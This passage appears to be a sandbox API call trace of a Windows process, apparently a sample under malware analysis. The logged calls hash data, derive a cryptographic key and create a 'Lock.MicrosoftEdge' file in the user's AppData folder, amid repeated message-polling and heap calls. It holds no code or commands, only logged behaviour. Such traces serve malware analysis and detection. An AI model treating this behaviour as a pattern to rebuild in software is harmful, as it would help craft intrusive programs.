wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0174.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0174.012] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0174.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0174.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0174.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.012] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.012] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0174.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaabe8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0174.012] CryptHashData (hHash=0x9e2138, pbData=0x2a71af8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0174.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.012] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.012] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.012] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.013] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0174.013] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.013] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0174.013] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.013] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0174.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaabe8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0174.013] CryptDeriveKey (in: hProv=0xa7c4c8, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0174.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.013] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.013] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0174.013] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.013] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0174.013] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0174.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0174.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0174.014] CryptDestroyHash (hHash=0x9e2138) returned 1 [0174.014] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.015] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/MicrosoftEdge" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoftedge"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.015] GetLastError () returned 0x5 [0174.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0174.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.015] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0174.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0174.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0174.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0174.015] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.MicrosoftEdge" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.microsoftedge"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0174.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0174.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0174.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0174.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0174.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0174.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0174.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0174.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0174.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0174.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0174.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0174.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0174.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0174.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0174.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0174.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0174.021] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730c8 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0174.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0174.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaaf8 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0174.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0174.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) 